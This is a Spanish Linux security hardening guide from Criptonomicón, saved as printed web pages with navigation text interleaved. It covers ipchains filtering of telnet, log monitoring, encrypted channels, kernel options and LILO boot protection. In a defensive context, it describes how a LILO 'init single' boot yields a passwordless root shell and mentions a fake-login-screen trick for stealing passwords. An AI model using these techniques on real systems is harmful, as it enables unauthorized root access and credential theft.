ipchains -A input -j DENY -s 0/0 -d $4/32 23 -p tcp -i
ppp0 -l
poniendo la anterior lnea en el fichero /etc/ppp/ip-up (y ipchains -F
input en ip-down) estaramos aadiendo (-A) un filtro de entrada (input), que
deniega (-j DENY) desde cualquier sitio de internet (-s 0/0) dirigidas a nuestro
equipo (-d $4/32) al puerto telnet (23) por tcp (-p tcp) que lleguen desde
internet (en este caso -i ppp0) y que adems las anote en el registro de incidencias

file:///C|/TEMP/criptonomicon/criptonomicon/linux/tcpwrapper.html (1 of 2) [25/10/2000 02:34:35 p.m.]

Seguridad de Red - TCP Wrapper

(-l) ($4 es la direccin IP que obtenemos dinmicamente).


El mecanismo de filtrado de conexiones se realiza en el ncleo del sistema operativo
y si ha sido compilado con estas opciones. Normalmente lo est. Este filtrado se
realiza a nivel de red y transporte: cuando llega un paquete por un interfaz de red se
analiza siguiendo los filtros de entrada. Este paquete puede ser aceptado, denegado o
rechazado, en este ltimo caso se avisa al remitente. Si los filtros de entrada aceptan
el paquete, pasa al sistema si era su destino final o pasa por los filtros de reenvo o
enmascaramiento, donde se vuelve a repetir una de las acciones. Por ltimo, los
paquetes que proceden del propio sistema o los que han sido aceptados por los filtros
de reenvo o enmascaramiento pasan al filtro de salida. En cualesquiera de estos
filtros se puede indicar que lo anote en el registro de incidencias.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/tcpwrapper.html (2 of 2) [25/10/2000 02:34:35 p.m.]

Seguridad de Red - Registro y conocimiento de incidencias

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la

Registro y conocimiento de incidencias


A parte de todo esto, puede conocer las incidencias que ocurren
durante el funcionamiento del sistema. Por un lado conviene
familiarizarse con los procesos que se ejecutan habitualmente en
una mquina. Es una buena costumbre ejecutar peridicamente ps
axu. Cualquier cosa extraa debiramos aclararla. Puede matar
cualquier proceso con la orden kill -9 pid (o killall -9
nombre_proceso). Pero en caso de ataque activo, lo mejor es
desconectar de la red inmediatamente, si es posible, claro est.
Despus tenemos los registros de incidencias (las ubicaciones
pueden ser diferentes dependiendo del sistema, pero no
radicalmente distintas) de /var/log.

Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales

Seguridad

Trabajando en modo texto se puede hacer en una consola virtual (como root)
Qu hacer en caso de
Ruptura?

tail -f /var/log/messages
y

Recursos

tail -f /var/log/secure
y de esta forma podemos ir viendo las incidencias del sistema. Conviene tambin
familiarizarse con las anotaciones que aparecen habitualmente para diferenciarlas de
las que puedan presentar un problema.
En modo grfico hay un programa llamado ktail que le muestra las incidencias de
una forma similar a la anterior.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/incidencias.html [25/10/2000 02:34:35 p.m.]

Seguridad de Red - Comunicaciones seguras

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Comunicaciones seguras
Por ltimo, nos interesar mantener unas comunicaciones seguras
para garantizar la privacidad e integridad de la informacin.
Actualmente existen las herramientas necesarias para cada
necesidad.
Podemos usar cifrados simtricos como pgp y gpg para
documentos, correo electrnico y comunicaciones sobre canales
inseguros

Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras

Podemos crear canales de comunicacin seguros de distinto tipo:


Consejos finales
SSH (Secure Shell), stelnet: SSH y stelnet son programas
que le permiten efectuar conexiones con sistemas remotos y
mantener una conexin cifrada. Con esto evitamos, entre otras cosas, que las
claves circulen por la red sin cifrar.
Cryptographic IP Encapsulation (CIPE): CIPE cifra los datos a nivel de red. El
viaje de los paquetes entre hosts se hace cifrado. A diferencia de SSH que cifra
los datos por conexin, lo hace a nivel de socket. As un conexin lgica entre
programas que se ejecutan en hosts diferentes est cifrada. CIPE se puede usar
en tunnelling para crear una Red Virtual Privada. El cifrado a bajo nivel tiene
la ventaja de poder hacer trabajar la red de forma transparente entre las dos
redes conectadas en la RVP sin ningn cambio en el software de aplicacin.
SSL: o Secure Sockets Layer, fue diseado y propuesto en 1994 por Netscape
Communications Corporation junto con su primera versin del Navigator
como un protocolo para dotar de seguridad a las sesiones de navegacin a
travs de Internet. Sin embargo, no fue hasta su tercera versin, conocida
como SSL v3.0 que alcanz su madurez, superando los problemas de
seguridad y las limitaciones de sus predecesores. En su estado actual
proporciona los siguientes servicios:
Cifrado de datos: la informacin transferida, aunque caiga en manos de
un atacante, ser indescifrable, garantizando as la confidencialidad.
Autenticacin de servidores: el usuario puede asegurarse de la identidad
del servidor al que se conecta y al que posiblemente enve informacin
personal confidencial.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/comseguras.html (1 of 2) [25/10/2000 02:34:35 p.m.]

Seguridad de Red - Comunicaciones seguras

Integridad de mensajes: se impide que modificaciones intencionadas o


accidentales en la informacin mientras viaja por Internet pasen
inadvertidas.
Opcionalmente, autenticacin de cliente: permite al servidor conocer la
identidad del usuario, con el fin de decidir si puede acceder a ciertas
reas protegidas.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/comseguras.html (2 of 2) [25/10/2000 02:34:35 p.m.]

Seguridad de Red - Consejos finales

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Consejos finales
Limite las acciones que realice como root al mnimo
imprescindible, y sobre todo no ejecute programas desconocidos.
Por ejemplo, en un juego (el quake) que distribua una revista
haba un programa llamado runme que enviaba por mail las
caractersticas de la mquina a una direccin de correo. En este
caso se trataba de un troyano inofensivo, pero ofrece una idea de
lo que puede hacer un programa ejecutado sin saberse lo que hace.
Linux tambin tiene la posibilidad de proporcionar acceso
transparente a Internet a una red local mediante IP masquerade.
En este caso, si usamos direcciones de red privadas, nos
aseguramos que los equipos de la red interna no son accesibles
desde Internet si no es a travs del equipo Linux.

Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales

Tambin podemos instalar un servidor proxy con cach, que a la vez que acta de
filtro de conexiones a nivel de aplicacin, puede acelerar el acceso a servicios desde
la red local.

Recursos

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/consejosred.html [25/10/2000 02:34:36 p.m.]

Seguridad del ncleo - Opciones de compilacin del ncleo

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Opciones de compilacin del ncleo


IP: Drop source routed frames
(CONFIG_IP_NOSR)

Introduccin
Opciones de
compilacin

Esta opcin debera estar activada. Source routed frames


Dispositivos del ncleo
contienen la ruta completa de sus destinos dentro del paquete.
Esto significa que los enrutadores a travs de los que circula el paquete no necesitan
inspeccionarlo, y slo lo reenvan. Esto podra ocasionar que los datos que entran a
su sistema puedan ser un exploit potencial.

Seguridad de Red

IP: Firewalling (CONFIG_IP_FIREWALL)


Seguridad del Root
Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Esta opcin es necesaria si va a configurar su mquina como un cortafuegos, hacer


enmascaramiento o desea proteger su estacin de trabajo con lnea telefnica de que
alguien entre a travs de su interfaz PPP. Con esta opcin activa podremos usar el
filtrado de paquetes en el propio ncleo del sistema, decidiendo el trfico que llega o
sale de nuestro equipo.

IP: forwarding/gatewaying (CONFIG_IP_FORWARD)


Si activa reenvo IP (IP forwarding), su Linux esencialmente se convierte en un
encaminador (router). Si su mquina est en una red, podra estar enviando datos de
una red a otra, y quizs saltndose un cortafuegos que est puesto all para evitar que
esto suceda. A los usuarios con un puesto aislado y conexin telefnica les interesar
desactivar esta caracterstica. Otros usuarios deberan pensar en las implicaciones de
seguridad de hacer esto en su caso concreto. Las mquinas que acten como
cortafuegos tendrn que activar esta caracterstica y usarla junto al software
cortafuegos. Puede activar y desactivar el reenvo IP (IP forwarding) dinmicamente
usando el siguiente comando:
root# echo 1 > /proc/sys/net/ipv4/ip_forward
y desactivarlo con el comando:
root# echo 0 > /proc/sys/net/ipv4/ip_forward
Ese fichero (y muchos otros ficheros de /proc) aparecer con longitud cero, pero en
realidad no es un fichero en el sentido clsico, sino que son datos guardados en

file:///C|/TEMP/criptonomicon/criptonomicon/linux/opccompnucleo.html (1 of 2) [25/10/2000 02:34:36 p.m.]

Seguridad del ncleo - Opciones de compilacin del ncleo

memoria.

IP: firewall packet logging


(CONFIG_IP_FIREWALL_VERBOSE)
Esta opcin le suministra informacin sobre los paquetes que su cortafuegos recibe,
como remitente, destinatario, puerto, etc. As podremos rastrear los orgenes de los
posibles intentos de ataque.

IP: always defragment (CONFIG_IP_ALWAYS_DEFRAG)


Generalmente esta opcin est desactivada, pero si est construyendo un host
cortafuegos o para enmascaramiento, deber activarla. Cuando se envan paquetes de
un host a otro, no siempre se envan como simples paquetes de datos, sino que se
fragmentan en varios trozos. El problema es que los nmeros de puerto slo se
almacenan en el primer fragmento. Esto significa que alguien puede insertar
informacin en el resto de los paquetes para su conexin que se supone que no
deberan estar all.

IP: syn cookies (CONFIG_SYN_COOKIES)


El ataque SYN es un ataque de denegacin de servicio (denial of service, DoS) que
consume todos los recursos de su mquina forzando un reinicio. No podemos
encontrar ninguna razn por la que no debiera activar esto.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/opccompnucleo.html (2 of 2) [25/10/2000 02:34:36 p.m.]

Seguridad del ncleo - Dispositivos del ncleo

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad

Dispositivos del ncleo


Hay algunos dispositivos de bloque y carcter disponibles en
Linux que tambin le resultarn utiles para mantener la seguridad
de sus sistema.
Los dos dispositivos /dev/random y /dev/urandom los proporciona
el ncleo para generar datos aleatorios en cualquier instante. Por
ejemplo, se utilizan para iniciar un nmero de secuencia para
conexiones TCP/IP.

Introduccin
Opciones de
compilacin
Dispositivos del
ncleo

Ambos, /dev/random y /dev/urandom, deberan ser suficientemente seguros como


para generar claves PGP, SSH y otras aplicaciones donde son un requisito nmeros
aleatorios seguros para generar claves vlidas para una sesin. Los atacantes no
deberan ser capaces de determinar el siguiente nmero dada cualquier secuencia de
nmeros con este origen. Se han dedicado muchos esfuerzos para garantizar que los
nmeros que se obtienen de esta fuente son pseudoaleatorios en todos los sentidos de
la palabra pseudoaleatorio.

Qu hacer en caso de
Ruptura?

Recursos

La nica diferencia es que /dev/random suministra bytes aleatorios y le hace esperar


para que se acumulen ms. Observe que en algunos sistemas puede bloquear durante
un rato a la espera de que se genere una nueva entrada de usuario al sistema. Por
tanto debe tener cuidado al usar /dev/random. (Quizs lo mejor que puede hacer es
usarlo cuando est generando informacin sensible de claves e indicarle al usuario
que pulse una tecla repetidas veces hasta que indique por la pantalla "Ya es
suficiente").
/dev/random tiene gran calidad de entropa, midiendo tiempos entre interrupciones,
etc. Bloquea hasta que hay disponibles suficientes bits de datos aleatorios.
/dev/urandom es parecido, no es tan seguro, pero suficiente para la mayora de las
aplicaciones. Puede leer los dispositivos usando algo parecido a lo siguiente:
root# head -c 6 /dev/urandom | uuencode Esto imprimir seis caracteres aleatorios en la consola, vlidos para la generacin de
una clave.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/dispnucleo.html (1 of 2) [25/10/2000 02:34:37 p.m.]

Seguridad del ncleo - Dispositivos del ncleo


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/dispnucleo.html (2 of 2) [25/10/2000 02:34:37 p.m.]

Seguridad en el arranque

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Seguridad en el arranque
Cuando alguien inicia el sistema operativo Linux se encuentra con
una pantalla de login: el sistema est pidiendo que se identifique.
Si es un usuario conocido, podr iniciar una sesin y trabajar con
el sistema. Si no lo es, no tendr opcin de hacer absolutamente
nada. Adems, el sistema registra todos los intentos de acceso
(fallidos o no), por lo que no pasarn desapercibidos intentos
repetidos de acceso no autorizado.

Seguridad fsica
Seguridad en el
arranque
Bloqueo de la consola

LILO (Linux Loader) es el encargado de cargar el sistema operativo en memoria y


pasarle informacin para su inicio. A su vez, Vd. puede pasarle parmetros a LILO
para modificar su comportamiento.
Por ejemplo, si alguien en el indicador de LILO aade init single, el sistema se inicia
en modo monousuario y proporciona una shell de root sin contrasea. Si en su
entorno de trabajo cree necesario evitar que alguien pueda iniciar el sistema de esta
forma, debera utilizar el parmetro restricted en el fichero de configuracin de LILO
(habitualmente /etc/lilo.conf). Este parmetro le permite iniciar normalmente el
sistema, salvo en el caso de que se hayan incluido argumentos en la llamada a LILO,
que solicita una clave. Esto proporciona un nivel de seguridad razonable: permite
iniciar el sistema, pero no manipular el arranque. Si tiene mayores necesidades de
seguridad puede incluir la opcin password. De esta forma necesitar una clave para
iniciar el sistema. En estas condiciones, slo podr iniciar el sistema quien conozca
la clave.
Puede encontrar ms detalles en las pginas del manual lilo y lilo.conf. Para ello,
introduzca en la lnea de comandos las siguientes rdenes:
# man lilo
# man lilo.conf
Otros detalles que le podran resultar tiles.
Prepare un disco de arranque del sistema. Es muy fcil, simplemente tiene que
copiar el ncleo del sistema operativo en el disco, sin sistema de ficheros, e
indicarle cual es la particin raz del sistema.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/segarranque.html (1 of 2) [25/10/2000 02:34:38 p.m.]

Seguridad en el arranque

# dd if=/boot/vmlinuz of=/dev/fd0
# rdev /dev/fd0 /dev/hdXY

Suponiendo que estemos usando un disco duro IDE, X indica el disco (a,b,c, o
d), Y indica la particin (1,2,...).
Si tiene ms de un sistema operativo en su mquina, le puede interesar hacer
una copia de salvaguardia del MBR:
# dd if=/dev/hda of=/boot/arranque.mbr count=1

Y ahora algunas consideraciones generales:


Tenga en cuenta que ningn sistema es realmente seguro si alguien, con los
conocimientos necesarios, puede usar su propio disco para arrancar.
Si tiene una mquina servidora, y tiene una clave para el arranque, la mquina
no se reiniciar sin suministrar la clave y tendr que acudir a introducirla en el
caso de una parada no prevista.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/segarranque.html (2 of 2) [25/10/2000 02:34:38 p.m.]

Seguridad fsica - Bloqueo de la consola

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Bloqueo de la consola
En los entornos Unix es conocido el truco de ejecutar en una
teminal, que alguien ha dejado inocentemente abierto, un guion
que simule la pantalla de presentacin al sistema. Entonces un
usuario incauto introudcir su nombre y clave, que quedarn a
merced del autor del engao.

Seguridad fsica
Seguridad en el
arranque
Bloqueo de la consola

Si se aleja de su mquina de vez en cuando, estara bien poder bloquear su consola


para que nadie pueda manipularla o mirar su trabajo. Dos programas que hacen esto
son xlock y vlock.
xlock bloquea la pantalla cuando nos encontramos en modo grfico. Est incluido
en la mayora de las distribuciones Linux que soportan X. En general puede ejecutar
xlock desde cualquier xterm de su consola y bloquear la pantalla de forma que
necesitar su clave para desbloquearla. Mire la pgina de manual para ver ms
detalles, algunos curiosos.
vlock es un simple programa que le permite cerrar alguna o todas las consolas
virtuales de su mquina Linux. Puede bloquear slo aqulla en la que est trabajando
o todas. Si slo cierra una, las otras se pueden abrir y utilizar la consola, pero no se
podr usar su vty hasta que no la desbloquee.
Desde luego, bloquear una consola prevendr que alguien manipule su trabajo, pero
no previene de reinicios de la mquina u otras formas de deteriorar su trabajo.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/bloqconsola.html [25/10/2000 02:34:38 p.m.]

Seguridad en Linux - Cmo de Seguro es Seguro?

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Cmo de Seguro es Seguro?


Primero, tenga en cuenta que ningn sistema es "completamente"
seguro. El nico sistema seguro es aquel que no est conectado en
red, que est apagado y encerrado bajo llave.

Por qu la Seguridad
Qu significa
Seguro?

Desde esta perspectiva, partimos de que todo lo nico que puede


Seguridad en el
hacer es aumentar la dificultad para que alguien pueda
desarrollo de Linux
comprometer la seguridad de su sistema. Tampoco todos los
usuarios tienen las mismas necesidades de seguridad en sus
Servicios en Linux
entornos. Por ejemplo, los usuarios domsticos de Linux, no
necesitan demasiado trabajo para mantener alejados a los crackers Qu Quiere Proteger?
ocasionales, mientras que para los usuarios muy especializados de
Linux, como por ejemplo servidores de Internet, bancos,
compaas de telecomunicaciones, etc., se necesita un trabajo mucho ms detallado
para garantizar la seguridad en los trminos previstos.
Tambin tenemos que tener en cuenta que existe una relacin inversa entre seguridad
y funcionalidad. Tiene que decidir dnde est el equilibrio entre la facilidad de uso
de su sistema y su seguridad. Por ejemplo, puede necesitar que cualquiera que llame
por el mdem a su sistema, y nuestro mdem tenga que devolver la llamada a su
nmero de casa. Este mecanismo garantiza un mayor nivel de seguridad, pero si
alguien no est en casa, le hace ms difcil conectarse. Otra forma de aumentar la
seguridad sera no tener conexin con Internet, pero seguro que no es eso lo que
queremos.
Tambin existe una relacin inversa entre el nivel de seguridad y el nmero de
servicios distintos que presta un sistema. Cada servicio prestado por un sistema
puede ser susceptible de ser utilizado contra el propio equipo servidor, como puede
ser el caso de bloqueos intencionados, conocidos como ataque de denegacin de
servicio (DoS). Pero un sistema servidor que no presta servicios es menos servidor.
En el caso de administrar un instalacin mediana o grande conviene establecer una

file:///C|/TEMP/criptonomicon/criptonomicon/linux/comoseguro.html (1 of 2) [25/10/2000 02:34:39 p.m.]

Seguridad en Linux - Cmo de Seguro es Seguro?

"Poltica de Seguridad" que fije el nivel de seguridad que requiere ese sitio y que
sistema de comprobacin se realiza. Puede encontrar un ejemplo muy conocido de
poltica de seguridad en el RFC 2196.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/comoseguro.html (2 of 2) [25/10/2000 02:34:39 p.m.]

Seguridad en Linux - Seguridad en el desarrollo de Linux

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad

Seguridad en el desarrollo de Linux


Como probablemente sabr, las fuentes del ncleo de linux son
abiertas. Cualquiera puede obtenerlas, analizarlas y modificarlas.
Este modelo de desarrollo abierto, que siguen tanto Linux como la
mayora de las aplicaciones que se ejecutan sobre l, conduce a
altos niveles de seguridad. Es cierto que cualquiera puede acceder
al cdigo fuente para encontrar las debilidades, pero no es menos
cierto que el tiempo que tarda en aparecer la solucin para
cualquier debilidad se mide ms fcilmente en horas que en das.

Por qu la Seguridad
Qu significa Seguro?
Seguridad en el
desarrollo de Linux
Servicios en Linux
Qu Quiere Proteger?

Qu hacer en caso de
Ruptura?

Gracias a esto, Linux es conocido por su alto nivel de estabilidad


que parte del propio ncleo del sistema operativo (lo que
propiamente es Linux).

Recursos

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/desarrollo.html [25/10/2000 02:34:39 p.m.]

Seguridad en Linux - Servicios en Linux

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la

Servicios en Linux
Linux tiene disponible todos los servicios habituales en una red:
Bases de datos.
Servicios de internet.
Servicio de ficheros e impresin.
Utilidades necesarias para mantener el nivel de seguridad
requerido.

Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Por qu la Seguridad
Qu significa Seguro?
Seguridad en el
desarrollo de Linux

Servicios en Linux

Pero adems hay que resear que cada servicio funciona sin
Qu Quiere Proteger?
afectar al resto de los servicios. Vd. puede modificar la direccin
IP de su equipo, las rutas, aadir, parar o reiniciar un servicio
concreto sin que el resto de los servicios se vean afectados. Slo es necesario detener
el equipo para realizar operaciones con el hardware, como aadir un disco duro, o
utilizar un nuevo ncleo. No tendr, pues, la necesidad de tener que ser Vd. mismo el
atacante de su propio sistema, a diferencia de lo que ocurre en otros sistemas
operativos.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/servicios.html [25/10/2000 02:34:39 p.m.]

Seguridad en Linux - Qu Quiere Proteger?

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Qu Quiere Proteger?
Por qu la Seguridad
Normalmente querr garantizar que el sistema permanece en
funcionamiento de forma adecuada. Querr garantizar que nadie
Qu significa Seguro?
pueda obtener o modificar una informacin a la que no tiene
derecho legtimo. Y tambien querr garantizar unas
Seguridad en el
comunicaciones seguras. Una buena planificacin ayuda bastante
desarrollo de Linux
a conseguir los niveles de seguridad que pretendemos. Antes de
intentar asegurar su sistema debera determinar contra qu nivel
Servicios en Linux
de amenaza quiere protegerse, qu riesgo acepta o no y, como
resultado, cmo de vulnerable es su sistema. Debera analizar su Qu Quiere Proteger?
sistema para saber qu est protegiendo, por qu lo est
protegiendo, qu valor tiene y quines tienen responsabilidad
sobre sus datos y otros elementos.
Riesgo es la posibilidad de que un intruso pueda intentar acceder con xito a
su equipo. Puede un intruso leer y escribir en ficheros o ejecutar programas
que puedan causar dao?Pueden borrar datos crticos? Prevenir a su
compaa de la prdida de un trabajo importante realizado? Recuerde tambin
que alguien que obtenga acceso a su cuenta, o su sistema, tambin puede
hacerse pasar por Vd.

Adems, bata tener una sola cuenta insegura en su sistema para comprometer
toda su red. Un simple usuario al que se le permita presentarse al sistema
usando un fichero rhost, o permitir el uso de un servicio inseguro como tftp,
origina el riesgo de que los intrusos puedan usarlo para "meter un puerta". Una
vez que el intruso tiene una cuenta de usuario en su sistema, o en el sistema de
cualquier otro, puede usarla para conseguir acceso a otros sistemas o a otras
cuentas.
La amenaza proviene de alguien que tiene motivos para obtener acceso sin
autorizacin a su red o equipo. Debe decidir en quin confa para dotar de
acceso a su sistema y qu amenaza puede representar.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/proteger.html (1 of 3) [25/10/2000 02:34:40 p.m.]

Seguridad en Linux - Qu Quiere Proteger?

Las amenazas proceden de varios tipos de intrusos, y es til tener en mente sus
diferentes caractersticas cuando est asegurando sus sistemas.

El Curioso - Este tipo de intruso est interesado bsicamente en qu


tipo de sistema y datos posee.

El Malicioso - Este tipo de intruso pretender, bien hacerle caer su


sistema, modificar su pgina web o cualquier otra cosa que le cueste
tiempo y dinero recuperar.

El Intruso muy personalizado - Este tipo de intruso trata de usar su


sistema para ganar popularidad o mala fama. Puede usar su sistema para
promocionar sus habilidades.
La Competencia - Este tipo de intruso est interesado en los datos que
tiene en su sistema. Puede ser alguien que piense que tiene algo que le
puede interesar financieramente o de otra forma.
La vulnerabilidad describe el nivel de proteccin de su equipo frente a otra
red, y la posibilidad potencial para alguien que pueda obtener acceso no
autorizado.

Qe est en juego si alguien entra en su sistema? Desde luego ser distinto


para un usuario en casa con un enlace PPP dinmico que para las compaas
que conectan su mquina a Internet u otra gran red.
Cuanto tiempo me llevara recuperar/recrear cualquier dato que se ha
perdido? Una inversin en tiempo ahora puede ahorrar diez veces ms de
tiempo con posterioridad si tiene que recrear los datos que se perdieron. Ha
verificado su estrategia de copias de respaldo, y ha verificado sus datos
ltimamente?
La seguridad pretende que los sistemas informticos que utiliza una entidad se
mantengan en funcionamiento segn los requisitos de la poltica establecida
por la propia entidad. Cada entidad define una serie de servicios que pretende
obtener de una red de ordenadores para prestarlos a unos usuarios legtimos.
Bsicamente los requisitos de seguridad se puede resumir en una serie de
puntos ilustrativos:
Disponibilidad: consistente en mantener la informacin y los recursos de
acuerdo con los requisitos de utilizacin que pretende la entidad que
utiliza la red informtica. La disponibilidad de la informacin pretende
garantizar que no se limite el acceso autorizado a la informacin y el
correcto funcionamiento de los recursos.
Integridad: la informacin que se almacena en los sistemas o que circula
por las lneas de comunicacin debe estar protegida contra la
modificacin no autorizada. Requiere que la informacin slo pueda ser
modificada por las entidades autorizadas.
Autenticidad: la informacin que se almacena o circula por una red debe
permanecer protegida ante falsificaciones. La autenticidad requiere

file:///C|/TEMP/criptonomicon/criptonomicon/linux/proteger.html (2 of 3) [25/10/2000 02:34:40 p.m.]

Seguridad en Linux - Qu Quiere Proteger?

mecanismos de identificacin correctos, asegurando que las


comunicaciones se realizan entre entidades legtimas.
Confidencialidad: pretende evitar la difusin no autorizada de la
informacin. Requiere que la informacin sea accesible nicamente por
las entidades autorizadas.
No rechazo: establecer los mecanismos para que nadie pueda negar que
ha realizado una determinada comunicacin.

En particular, en Linux tendremos que proteger ciertos ficheros que contienen


informacin sobre los usuarios (/etc/passwd, /etc/shadow), los ficheros de
configuracin del sistema (los contenidos en /etc), el acceso al sistema para que se
realice segn marca la poltica prevista y la correcta utilizacin de los recursos para
evitar abusos (p.e. si un usuario tiene slo una cuenta de correo, que no pueda abrir
una shell en el sistema). A todo esto habr que sumar la proteccin de los distintos
servicios que presta.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
